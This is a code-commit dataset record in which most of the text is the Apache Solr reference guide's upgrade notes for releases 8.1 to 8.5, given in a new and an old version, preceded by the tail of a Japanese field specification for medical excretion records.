mmlFs:boVolume\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u91cf\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.3. mmlFs:boUnit\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u91cf\u306e\u5358\u4f4d\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs04\n\n===== M23.4.4. mmlFs:boStatus\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u6027\u72b6\u3002\u8edf\u4fbf\u3001\u4e0b\u75e2\u3001\u6df7\u6fc1\u306a\u3069\u3002\u5927\u91cf\u30fb\u4e2d\u7b49\u91cf\u3001\u5c11\u91cf\u306a\u3069\u6570\u5024\u5316\u3067\u304d\u306a\u3044\u5834\u5408\u306b\u306f\u3053\u3053\u306b\u8a18\u8f09\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.5. 
mmlFs:boColor\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u8272\u8abf\u3002\u9ec4\u8272\u3001\u8336\u8910\u8272\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.6. mmlFs:pathway\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7d4c\u8def\u3001\u30ab\u30c6\u30fc\u30c6\u30eb\u3084\u30c9\u30ec\u30fc\u30f3\u3001\u30b9\u30c8\u30de\u306a\u3069 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.7. mmlFs:boStartTime\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u958b\u59cb\u6642\u9593\u3002\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3092\u8a18\u9332\u3059\u308b\u3002\u958b\u59cb\u3001\u7d42\u4e86\u306e\u5225\u306a\u304f\u8a18\u9332\u3092\u3059\u308b\u5834\u5408\u306b\u306f\u3053\u3061\u3089\u306b\u6642\u9593\u3092\u8a18\u5165\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.8. mmlFs:boEndTime\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7d42\u4e86\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.8. mmlFs:boMemo\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306b\u95a2\u3059\u308b\u30b3\u30e1\u30f3\u30c8\u3001\u30e1\u30e2\u3002\u4fbf\u79d83\u65e5\u76ee\u3001\u51fa\u8840\u306f\u53ce\u675f\u50be\u5411\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.9. mmlFs:boFrequency\n\u3010\u5185\u5bb9\u3011\u4e00\u5b9a\u6642\u9593\u5185\u306e\u6392\u6cc4\u56de\u6570\u3092\u8868\u73fe\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8\u3002 +\n\u3010\u7e70\u308a\u8fd4\u3057\u30110\u56de\u4ee5\u4e0a\u306e\u7e70\u308a\u8fd4\u3057\u3042\u308a\n\n===== M23.4.10. mmlFs:bofTimes\n\u3010\u5185\u5bb9\u3011\u4e00\u5b9a\u671f\u9593\u5185\u306b\u89b3\u5bdf\u3055\u308c\u305f\u6392\u6cc4\u56de\u6570\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.1. mmlFs:bofPeriodStartTime\n\u3010\u5185\u5bb9\u3011\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.2. mmlFs:bofPeriodEndTime\n\u3010\u5185\u5bb9\u3011\u89b3\u5bdf\u3092\u7d42\u4e86\u3057\u305f\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.3 mmlFs:bofMemo\n\u3010\u5185\u5bb9\u3011\u6570\u5024\u5316\u3055\u308c\u306a\u3044\u983b\u5ea6\u8868\u73fe\u3002\u983b\u56de\u3001\u4e4f\u5c3f\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.4. 
mmlFs:fsMemo\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u30b3\u30e1\u30f3\u30c8\u3001\u30e1\u30e2\u3002\u305d\u306e\u4ed6\u306e\u4f53\u6e29\u8868\u306b\u8a18\u8f09\u3059\u308b\u5185\u5bb9\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7e70\u308a\u8fd4\u3057\u3011\u7701\u7565\u53ef\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"74b9ba396c670cff7b738563475a92b8051f6690","subject":"SOLR-14147: comment out for now link to security manager docs in upgrade notes that don't exist on master","message":"SOLR-14147: comment out for now link to security manager docs in upgrade notes that don't exist on master\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/solr-upgrade-notes.adoc","new_file":"solr\/solr-ref-guide\/src\/solr-upgrade-notes.adoc","new_contents":"= Solr Upgrade Notes\n:page-children: major-changes-in-solr-9, major-changes-in-solr-8, major-changes-in-solr-7, major-changes-from-solr-5-to-solr-6\n:page-toclevels: 3\n:page-tocclass: right\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nThe following notes describe changes to Solr in recent releases that you should be aware of before upgrading.\n\nThese notes highlight the biggest changes that may impact the largest number of\nimplementations. It is not a comprehensive list of all changes to Solr in any release.\n\nWhen planning your Solr upgrade, consider the customizations you have made to\nyour system and review the {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`]\nfile found in your Solr package. That file includes all the changes and updates\nthat may affect your existing implementation.\n\nDetailed steps for upgrading a Solr cluster are in the section <<upgrading-a-solr-cluster.adoc#upgrading-a-solr-cluster,Upgrading a Solr Cluster>>.\n\n== Upgrading to 9.x Releases (NOT RELEASED)\n\n\/\/ DEVS: please put 9.0 Upgrade Notes in `major-changes-in-solr-9.adoc`!.\n\n== Upgrading to 8.x Releases\n\nIf you are upgrading from 7.x, see the section <<Upgrading from 7.x Releases>> below.\n\n=== Solr 8.5\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote85[8.5 Release Notes]\nfor an overview of the main new features of Solr 8.5.\n\nWhen upgrading to 8.5.x, users should be aware of the following major changes from 8.4.\n\n*Considerations for a SolrCloud Upgrade*\n\nSolr 8.5 introduces a change in the format used for the elements in the Overseer queues and maps (see https:\/\/issues.apache.org\/jira\/browse\/SOLR-14095[SOLR-14095] for technical discussion of the change). 
This queue is used internally by the Overseer to reliably handle\noperations, to communicate operation results between the Overseer and the coordinator node, and by the REQUESTSTATUS API for displaying information about async Collection operations.\n\nThis change won\u2019t require you to change any client-side code, and you should see no differences on the client side.\nHowever, it does require some care when upgrading an existing SolrCloud cluster, depending on your upgrade strategy.\n\nIf you are upgrading Solr with an atomic restart strategy:\n\n* If you don\u2019t use async or REQUESTSTATUS operations, you should be able to restart and not see any issues.\n* If you do use Collection API operations:\n. Pause Collection API operations.\n. Clean up queues (see the section <<collections-api.adoc#deletestatus,DELETESTATUS>> for examples)\nif you use async operations.\n. Upgrade and restart the nodes.\n. Resume all normal operations.\n\nIf you are upgrading Solr with a rolling restart strategy:\n\n* If you don\u2019t use Collection API operations, you should be able to do a rolling restart and not see\nany issues.\n* If you do use Collection API operations but can pause their use during the restart, the easiest\nway is to:\n. Pause Collection API operations.\n. Upgrade and restart all nodes.\n. Clean up queues (see the section <<collections-api.adoc#deletestatus,DELETESTATUS>> for examples)\nif you use async operations.\n. Resume all normal operations.\n\nIf you use Collection API operations and can\u2019t pause them during the upgrade:\n\n. Start 8.5 nodes with the system property: `-Dsolr.useUnsafeOverseerResponse=deserialization`. Ensure the\nOverseer node is upgraded last.\n. Once all nodes are on 8.5 and you no longer need to read the old status format, restart again, removing the\nsystem property.\n\nIf you prefer to keep the old (but insecure) serialization strategy, you can start your nodes using the system\nproperty: `-Dsolr.useUnsafeOverseerResponse=true`. Keep in mind that this will be removed in a future version of Solr.\n\n*Security Manager*\n\nSolr now has the ability to run with a Java security manager enabled. To enable this, set the property `SOLR_SECURITY_MANAGER_ENABLED=true` in `solr.in.sh` or `solr.in.cmd`. Note that if you are using HDFS to store indexes, you cannot enable the security manager.\n\nIn Solr 9.0, this will be the default.\n\n\/\/ See SOLR-14147: See also the section <<securing-solr.adoc#enable-security-manager,Enable Security Manager>>.\n\n*Block\/Allow Specific IPs*\n\nSolr has two new parameters to allow you to restrict access to Solr using IP addresses. Use `SOLR_IP_WHITELIST` to configure a whitelist, and `SOLR_IP_BLACKLIST` to configure a blacklist. These properties are defined in `solr.in.sh` or `solr.in.cmd`.\n\nSee also the section <<securing-solr.adoc#enable-ip-access-control,Enable IP Access Control>>.\n\n*BlockJoin Facet Deprecation*\n\nThe BlockJoinFacetComponent is marked for deprecation and will be removed in 9.0.\nUsers are encouraged to migrate to `uniqueBlock()` in the JSON Facet API.\nMore information about this is available in the section <<json-faceting-domain-changes.adoc#block-join-domain-changes,Block Join Domain Changes>>.\n\n*Caching with the Boolean Query Parser*\n\nBy default, the <<other-parsers.adoc#boolean-query-parser,Boolean Query Parser>> caches queries in Solr's filterCache. It's now possible to disable this with the local param `cache=false`.
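For instance, the following sketch (the collection name and fields are assumptions for illustration) keeps a one-off boolean filter out of the filterCache:\n\n[source,bash]\n----\n# cache=false opts this boolean filter out of the filterCache\ncurl 'http:\/\/localhost:8983\/solr\/techproducts\/select' --data-urlencode 'q=*:*' --data-urlencode 'fq={!bool cache=false must=\"inStock:true\" must=\"cat:electronics\"}'\n----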
\n\n*Indexing Log Files*\n\nSolr now includes a command line tool, `bin\/postlogs`, which will index Solr's log files into a collection.\nThis provides an easy way to use Solr or visualization tools (such as Zeppelin) to troubleshoot problems with the system.\n\nThis tool is not yet officially documented in the Reference Guide, but draft documentation is available in a branch and can be accessed https:\/\/github.com\/apache\/lucene-solr\/blob\/visual-guide\/solr\/solr-ref-guide\/src\/logs.adoc[via GitHub].\n\n*Highlighting*\n\nSolr's Unified Highlighter now has two parameters to help control passage sizing, `hl.fragAlignRatio` and `hl.fragsizeIsMinimum`. See the section <<highlighting.adoc#the-unified-highlighter,The Unified Highlighter>> for details about these new parameters.\n\n*Shared Library System Parameter*\n\nSolr's `solr.xml` file has long had support for a `sharedLib` parameter, which allows you to define a common location for .jar files that may need to be in the path for all cores.\n\nThis property can now be defined in `solr.in.sh` or `solr.in.cmd` as a system property (`-Dsolr.sharedLib=\/path\/to\/lib`) added to `SOLR_OPTS` (see `solr.in.sh` or `solr.in.cmd` for details).\n\n=== Solr 8.4\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote84[8.4 Release Notes]\nfor an overview of the main new features of Solr 8.4.\n\nWhen upgrading to 8.4.x, users should be aware of the following major changes from 8.3.\n\n*Package Management System*\n\nVersion 8.4 introduces a package management system to Solr. The goals of the\nsystem are to allow hot (live) deployment of plugins, provide packaging\nguidelines for plugins, and standardize Solr's approach by following familiar\nconcepts used in other package management systems.\n\nThe system is designed to eventually replace use of the `<lib ..\/>` directive,\nthe Blob Store, and other methods of deploying plugins and custom components\nto Solr.\n\nThe system is currently considered experimental, so use with caution. It must\nbe enabled with a system parameter passed at startup before it can be used.\nFor details, please see the section <<package-manager.adoc#package-manager,Package Management>>.\n\nWith this feature, Solr's <<adding-custom-plugins-in-solrcloud-mode.adoc#adding-custom-plugins-in-solrcloud-mode,Blob Store>>\nfunctionality is now deprecated and will likely be removed in 9.0.\n\n*Security*\n\nThe following changes were all made with the intention of making Solr more secure out of the box.\n\n* The `solrconfig.xml` file in Solr's `_default` configset has been trimmed of\n the following previously pre-configured items:\n+\n** All `<lib ...\/>` directives. 
This means that Solr Cell (aka Tika), Learning\nto Rank, Clustering (with Carrot2), language identification, and Velocity (for\nthe `\/browse` sample search interface) are no longer enabled out of the box.\n** The `\/browse`, `\/tvrh`, and `\/update\/extract` request handlers.\n** The Term Vector Component.\n** The XSLT and Velocity response writers.\n+\nAll of these items can be added back to your Solr implementation by manually editing\n`solrconfig.xml`, or by using the <<config-api.adoc#config-api,Config API>>.\n+\nThe `sample_techproducts_configs` and the examples found in `.\/example` are unchanged.\n\n* Configsets that have been uploaded with an unsecured Configset API (i.e., when authentication is not enabled) are considered \"Untrusted Configsets\".\n+\nIn order to bolster Solr's out-of-the-box security, these untrusted configsets\nare no longer allowed to use the `<lib ...\/>` directive to implement contribs\nor custom Jars.\n+\nWhen upgrading to 8.4, if you are using untrusted configsets that contain `<lib ..\/>`\ndirectives, their corresponding collections will not load (they will cease to\nwork). You have a few options in this case:\n\n** You can secure your Solr instance with <<authentication-and-authorization-plugins.adoc#authentication-and-authorization-plugins,authentication>>\nand re-upload the configset (using the `bin\/solr zk upconfig ...`\n<<solr-control-script-reference.adoc#solr-control-script-reference,Solr CLI>> command);\n** You can put your custom Jars in Solr's classpath instead of `lib` directories;\n** You can try the new package management system to manage your custom Jars.\n+\nSee the section <<configsets-api.adoc#configsets-upload,Upload a Configset>>\n for more details about trusted vs. untrusted configsets.\n\n* Our default Jetty configuration has been updated to now set a\nContent-Security-Policy (CSP) by default. See `.\/server\/etc\/jetty.xml` for\ndetails about how it is configured.\n+\nAs a result of this change, any custom HTML served by Solr's HTTP server that contains inline JavaScript will no longer execute in modern browsers. The options for you are:\n\n** Change your JavaScript code so it no longer runs inline;\n** Edit `jetty.xml` to remove CSP (creating weaker security protection);\n** Remove\/alter the headers with a reverse proxy.\n\n* Solr's Blob Store and runtime libs functionality are now deprecated and are planned to be removed from Solr in version 9.0. They have been replaced with the new package management system, as sketched below.
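+\nA hypothetical sketch of the replacement workflow using the new package manager CLI (the repository URL, package name, and collection are assumptions, and the feature must first be enabled as described in the Package Management section):\n+\n[source,bash]\n----\n# Register a repository, install a plugin package, and deploy it\nbin\/solr package add-repo example-repo 'https:\/\/example.com\/repo'\nbin\/solr package install example-plugin\nbin\/solr package deploy example-plugin -collections techproducts\n----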
\n\n* The Velocity response writer is also now deprecated and is planned to be removed from Solr in version 9.0.\n\n*Using Collapse with Group Disallowed*\n\nUsing the <<collapse-and-expand-results.adoc#collapse-and-expand-results,CollapsingQueryParser>>\nwith <<result-grouping.adoc#result-grouping,Result Grouping>> has never been\nsupported, as it causes inconsistent behavior and NullPointerException errors.\nWe have now explicitly disallowed this combination to prevent these errors.\nIf you are using these together, you will need to modify your queries.\n\n*SolrJ*\n\n* SolrJ now supports the `shards.preference` parameter for single-shard\nscenarios to ensure multi-shard and single-shard request routing works in the same way.\n+\nSee <<using-solrj.adoc#cloud-request-routing,Cloud Request Routing>> and\n<<distributed-requests.adoc#shards-preference-parameter,shards.preference Parameter>> for details.\n\n* The return type of `QueryResponse.getExplainMap()` has changed from `Map<String, String>` to `Map<String, Object>` in order to support structured explanations.\n+\nThis change is expected to be mostly back-compatible. Compiled third-party\ncomponents will work the same due to type erasure, but source code changes may\nbe required.\n\n* Replica routing code has been moved to SolrJ, making those classes available\nto clients if necessary.\n\n*Streaming Expressions*\n\n* A new DBSCAN clustering streaming evaluator has been added.\n\n* The `precision` stream evaluator can now operate on matrices.\n\n* The `random` streaming expression can now create the x-axis.\n\n*JSON Facets*\n\n* Two new aggregations have been added: `missing` and `countvals`.\n\n* Several aggregations now support multi-valued fields: `min`, `max`, `avg`, `sum`, `sumsq`, `stddev`, `variance`, and `percentile`.\n\n*Caches*\n\n* After the addition of `CaffeineCache` in 8.3, legacy SolrCache\nimplementations are deprecated and likely to be removed in 9.0.\n+\nUsers are encouraged to transition their cache configurations to use\n`org.apache.solr.search.CaffeineCache` as soon as feasible.\n\n=== Solr 8.3\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote83[8.3 Release Notes] for an overview of the main new features of Solr 8.3.\n\nWhen upgrading to 8.3.x, users should be aware of the following major changes from 8.2.\n\n*JWT Authentication*\n\nJWT Authentication now supports multiple identity providers.\nTo allow this, the parameter `jwkUrl` has been deprecated and replaced with `jwksUrl`.\nImplementations using `jwkUrl` will continue to work as normal, but users\n should plan to transition their configurations to use `jwksUrl` instead as\n soon as feasible.\n\n*Caches*\n\n* Solr has a new cache implementation, `CaffeineCache`, which is now recommended over other caches. This cache is expected to generally provide most users with a lower memory footprint, a higher hit ratio, and better multi-threaded performance.\n+\nSince caching has a direct impact on the performance of your Solr\n implementation, before switching to any new cache implementation in\n production, take care to test for your environment and traffic patterns so\n you fully understand the ramifications of the change.\n\n* A new parameter, `maxIdleTime`, allows automatic eviction of cache items that have not been used in the defined amount of time. 
This allows the cache to release some memory and should aid those who want or need to fine-tune their caches.\n\nSee the section <<query-settings-in-solrconfig.adoc#query-settings-in-solrconfig,Query Settings in SolrConfig>> for more details about these and other cache options and parameters.\n\n=== Solr 8.2\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote82[8.2 Release Notes] for an overview of the main new features of Solr 8.2.\n\nWhen upgrading to 8.2.x, users should be aware of the following major changes from v8.1.\n\n*ZooKeeper 3.5.5*\n\nSolr 8.2 updates the version of ZooKeeper included with Solr to v3.5.5.\n\nIt is recommended that external ensembles set up to work with Solr also be updated to ZooKeeper 3.5.5.\n\nThis ZooKeeper release includes many new security features.\nIn order for Solr's Admin UI to work with 3.5.5, the `zoo.cfg` file must allow access to ZooKeeper's \"four-letter commands\".\nAt a minimum, `ruok`, `conf`, and `mntr` must be enabled, but other commands can optionally be enabled if you choose.\nSee the section <<setting-up-an-external-zookeeper-ensemble.adoc#configuration-for-a-zookeeper-ensemble,Configuration for a ZooKeeper Ensemble>> for details.\n\n[WARNING]\nUntil 8.3, https:\/\/issues.apache.org\/jira\/browse\/SOLR-13672[SOLR-13672] prevents the ZK Status screen in the Admin UI from reporting status. This only impacts the UI; ZooKeeper still operates correctly.\n\n*Routed Aliases*\n\n* Routed aliases now use collection properties to identify collections that belong to the alias; prior to 8.2, these aliases used core properties.\n+\nThis is backward-compatible and aliases created with prior versions will\n continue to work. However, new collections will no longer add the\n `routedAliasName` property to the `core.properties` file, so any external code\n depending on this location will need to be updated.\n\n\/\/ TODO: aliases.adoc still says this is per-core?\n\n* Time-routed aliases now include a `TRA` infix in the collection name, in the pattern `<alias>_TRA_<timestamp>`. +\nCollections created with older versions will continue to work.\n\n*Distributed Tracing Support*\n\nThis release adds support for tracing requests in Solr. Please review the section <<solr-tracing.adoc#solr-tracing,Distributed Solr Tracing>> for details on how to configure this feature.\n\n=== Solr 8.1\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote810[8.1 Release Notes] for an overview of the main new features of Solr 8.1.\n\nWhen upgrading to 8.1.x, users should be aware of the following major changes from v8.0.\n\n*Global maxBooleanClauses Parameter*\n\n* The behavior of the `maxBooleanClauses` parameter has changed to reduce the risk of exponential query expansion when dealing with pathological query strings.\n+\nA default upper limit of 1024 clauses is now enforced at the node level. This was the default prior to 7.0, and it can be overridden with a new global parameter in `solr.xml`. 
This limit will be enforced for all queries, whether explicitly defined by the user (or client) or created by Solr and Lucene internals.\n+\nAn identical parameter is available in `solrconfig.xml` for limiting the size of queries explicitly defined by the user (or client), but this per-collection limit will still be restricted by the global limit set in `solr.xml`.\n+\nIf your use case demands a lot of OR or AND clauses in your queries, upon upgrade to 8.1 you may need to adjust the global `maxBooleanClauses` parameter, since between 7.0 and 8.1 the limit was effectively unbounded.\n+\nFor more information about the new parameter, see the section <<format-of-solr-xml.adoc#global-maxbooleanclauses,Format of solr.xml: maxBooleanClauses>>.\n\n*Security*\n\n* JSON Web Tokens (JWT) are now supported for authentication. These allow Solr to assert a user is already authenticated via an external identity provider, such as an OpenID Connect-enabled IdP. For more information, see the section <<jwt-authentication-plugin.adoc#jwt-authentication-plugin,JWT Authentication Plugin>>.\n\n* A new security plugin for audit logging has been added. A default class `SolrLogAuditLoggerPlugin` is available and configurable in `security.json`. The base class is also extendable for adding custom audit plugins if needed. See the section <<audit-logging.adoc#audit-logging,Audit Logging>> for more information.\n\n*Collections API*\n\n* The output of the REQUESTSTATUS command in the Collections API will now include internal asynchronous requests (if any) in the \"success\" or \"failed\" keys.\n\n* The CREATE command will now return the appropriate status code (4xx, 5xx, etc.) when the command has failed. Previously, it always returned `0`, even in failure.\n\n* The MODIFYCOLLECTION command now accepts an attribute to set a collection as read-only. This can be used to block a collection from receiving any updates while still allowing queries to be served. See the section <<collection-management.adoc#modifycollection,MODIFYCOLLECTION>> for details on how to use it.\n\n* A new command RENAME allows renaming a collection by setting up a one-to-one alias using the new name. For more information, see the section <<collection-management.adoc#rename,RENAME>>.\n\n* A new command REINDEXCOLLECTION allows indexing existing stored fields from a source collection into a new collection. For more information, please see the section <<collection-management.adoc#reindexcollection,REINDEXCOLLECTION>>.\n\n*Logging*\n\n* The default Log4j2 logging mode has been changed from synchronous to asynchronous. This will improve logging throughput and reduce system contention at the cost of a _slight_ chance that some logging messages may be missed in the event of abnormal Solr termination.\n+\nIf even this slight risk is unacceptable, the Log4j configuration file found in `server\/resources\/log4j2.xml` has the synchronous logging configuration in a commented section and can be edited to re-enable synchronous logging.\n\n*Metrics*\n\n* The SolrGangliaReporter has been removed from Solr. The metrics library used by Solr, Dropwizard Metrics, was updated to version 4, and Ganglia support was removed from it due to a dependency on the LGPL license.\n\n*Browse UI (Velocity)*\n\n* Velocity and Velocity Tools were both upgraded as part of this release. Velocity upgraded from 1.7 to 2.0. Please see https:\/\/velocity.apache.org\/engine\/2.0\/upgrading.html for details about upgrading. Velocity Tools upgraded from 2.0 to 3.0. 
Please see https:\/\/velocity.apache.org\/tools\/3.0\/upgrading.html for details about that upgrade.\n\n*Default Garbage Collector (GC)*\n\n* Solr's default GC has been changed from CMS to G1. If you prefer to use CMS or any other GC method, you can modify the `GC_TUNE` section of `solr.in.sh` (*nix) or `solr.in.cmd` (Windows).\n\n\n== Upgrading from 7.x Releases\n\nThe upgrade from 7.x to Solr 8.0 introduces several major changes that you should be aware of before upgrading.\nThese changes are described in the section <<major-changes-in-solr-8.adoc#major-changes-in-solr-8,Major Changes in Solr 8>>. It's strongly recommended that you do a thorough review of that section before starting your upgrade.\n\n[NOTE]\nIf you run in SolrCloud mode, you must be on Solr version 7.3 or higher in order to upgrade to 8.x.\n\n== Upgrading from Pre-7.x Versions\n\nUsers upgrading from versions of Solr prior to 7.x are strongly encouraged to consult {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] for the details of _all_ changes since the version they are upgrading from.\n\nThe upgrade from Solr 6.x to Solr 7.0 introduced several *major* changes that you should be aware of before upgrading. Please do a thorough review of the section <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\nA summary of the significant changes between Solr 5.x and Solr 6.0 is in the section <<major-changes-from-solr-5-to-solr-6.adoc#major-changes-from-solr-5-to-solr-6,Major Changes from Solr 5 to Solr 6>>.\n","old_contents":"= Solr Upgrade Notes\n:page-children: major-changes-in-solr-9, major-changes-in-solr-8, major-changes-in-solr-7, major-changes-from-solr-5-to-solr-6\n:page-toclevels: 3\n:page-tocclass: right\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nThe following notes describe changes to Solr in recent releases that you should be aware of before upgrading.\n\nThese notes highlight the biggest changes that may impact the largest number of\nimplementations. It is not a comprehensive list of all changes to Solr in any release.\n\nWhen planning your Solr upgrade, consider the customizations you have made to\nyour system and review the {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`]\nfile found in your Solr package. 
That file includes all the changes and updates\nthat may effect your existing implementation.\n\nDetailed steps for upgrading a Solr cluster are in the section <<upgrading-a-solr-cluster.adoc#upgrading-a-solr-cluster,Upgrading a Solr Cluster>>.\n\n== Upgrading to 9.x Releases (NOT RELEASED)\n\n\/\/ DEVS: please put 9.0 Upgrade Notes in `major-changes-in-solr-9.adoc`!.\n\n== Upgrading to 8.x Releases\n\nIf you are upgrading from 7.x, see the section <<Upgrading from 7.x Releases>> below.\n\n=== Solr 8.5\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote85[8.5 Release Notes]\nfor an overview of the main new features of Solr 8.5.\n\nWhen upgrading to 8.5.x users should be aware of the following major changes from 8.4.\n\n*Considerations for a SolrCloud Upgrade*\n\nSolr 8.5 introduces a change in the format used for the elements in the Overseer queues and maps (see https:\/\/issues.apache.org\/jira\/browse\/SOLR-14095[SOLR-14095] for technical discussion of the change). This queue is used internally by the Overseer to reliably handle\noperations, to communicate operation results between the Overseer and the coordinator node, and by the REQUESTSTATUS API for displaying information about async Collection operations.\n\nThis change won\u2019t require you to change any client-side code you should see no differences on the client side.\nHowever, it does require some care when upgrading an existing SolrCloud cluster depending on your upgrade strategy.\n\nIf you are upgrading Solr with an atomic restart strategy:\n\n* If you don\u2019t use async or REQUESTSTATUS operations, you should be able to restart and not see any issues.\n* If you do use Collection API operations:\n. Pause Collection API operations.\n. Cleanup queues (See the section <<collections-api.adoc#deletestatus,DELETESTATUS>> for examples)\nif you use async operations.\n. Upgrade and restart the nodes.\n. Resume all normal operations.\n\nIf you are upgrading Solr with a rolling restart strategy:\n\n* If you don\u2019t use Collection API operations, you should be able to do a rolling restart and not see\nany issues.\n* If you do use Collection API operations, but you can pause their use during the restart the easiest\nway is to:\n. Pause Collection API operations.\n. Upgrade and restart all nodes.\n. Cleanup queues (See the section <<collections-api.adoc#deletestatus,DELETESTATUS>> for examples)\nif you use async operations.\n. Resume all normal operations.\n\nIf you use Collection API operations and can\u2019t pause them during the upgrade:\n\n. Start 8.5 nodes with the system property: `-Dsolr.useUnsafeOverseerResponse=deserialization`. Ensure the\nOverseer node is upgraded last.\n. Once all nodes are in 8.5 and once you don\u2019t need to read old status anymore, restart again removing the\nsystem property.\n\nIf you prefer to keep the old (but insecure) serialization strategy, you can start your nodes using the system\nproperty: `-Dsolr.useUnsafeOverseerResponse=true`. Keep in mind that this will be removed in future version of Solr.\n\n*Security Manager*\n\nSolr now has the ability to run with a Java security manager enabled. To enable this, set the property `SOLR_SECURITY_MANAGER_ENABLED=true` in `solr.in.sh` or `solr.in.cmd`. 
Note that if you are using HDFS to store indexes, you cannot enable the security manager.\n\nIn Solr 9.0, this will be the default.\n\nSee also the section <<securing-solr.adoc#enable-security-manager,Enable Security Manager>>.\n\n*Block\/Allow Specific IPs*\n\nSolr has two new parameters to allow you to restrict access to Solr using IP addresses. Use `SOLR_IP_WHITELIST` to configure a whitelist, and `SOLR_IP_BLACKLIST` to configure a blacklist. These properties are defined in `solr.in.sh` or `solr.in.cmd`.\n\nSee also the section <<securing-solr.adoc#enable-ip-access-control,Enable IP Access Control>>.\n\n*BlockJoin Facet Deprecation*\n\nThe BlockJoinFacetComponent is marked for deprecation and will be removed in 9.0.\nUsers are encouraged to migrate to `uniqueBlock()` in JSON Facet API.\nMore information about this is available in the section <<json-faceting-domain-changes.adoc#block-join-domain-changes,Block Join Domain Changes>>.\n\n*Caching with the Boolean Query Parser*\n\nBy default, the <<other-parsers.adoc#boolean-query-parser,Boolean Query Parser>> caches queries in Solr's filterCache. It's now possible to disable this with the local param `cache=false`.\n\n*Indexing 